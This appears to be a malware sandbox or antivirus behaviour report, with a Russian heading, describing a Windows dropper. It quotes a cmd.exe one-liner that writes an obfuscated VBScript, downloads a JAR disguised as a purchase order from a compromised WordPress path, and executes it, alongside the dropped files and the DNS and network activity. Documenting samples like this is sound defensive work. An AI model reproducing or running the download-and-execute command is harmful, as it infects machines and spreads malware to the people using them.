Техническая информация
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @eCHo X7i= "http://www.ediet.ir/wp-admin/user/New Order-P.O_2410.jar">>A3i.VBS &@eCHo K6t = U1s("jpnjoMi`q")>>A3i.VBS &@eCHo Set U0h = CreateObject(U1s("lrwlkQMwlkgsso"))>>A3...
- %TEMP%\a3i.vbs
- %TEMP%\kqokp.jar
- %TEMP%\a3i.vbs
- 'ed##t.ir':80
- http://www.ed##t.ir/wp-admin/user/New%20Order-P.O_2410.jar
- DNS ASK ed##t.ir
- '<SYSTEM32>\wscript.exe' "%TEMP%\A3i.VBS"
- '<SYSTEM32>\cmd.exe' /c cd %TEMP% & @eCHo X7i= "http://www.ediet.ir/wp-admin/user/New Order-P.O_2410.jar">>A3i.VBS &@eCHo K6t = U1s("jpnjoMi`q")>>A3i.VBS &@eCHo Set U0h = CreateObject(U1s("lrwlkQMwlkgsso"))>>A3...' (со скрытым окном)
- '<SYSTEM32>\timeout.exe' 13
- '%ProgramFiles%\java\jre1.8.0_45\bin\javaw.exe' -jar "%TEMP%\KQOKP.JAR"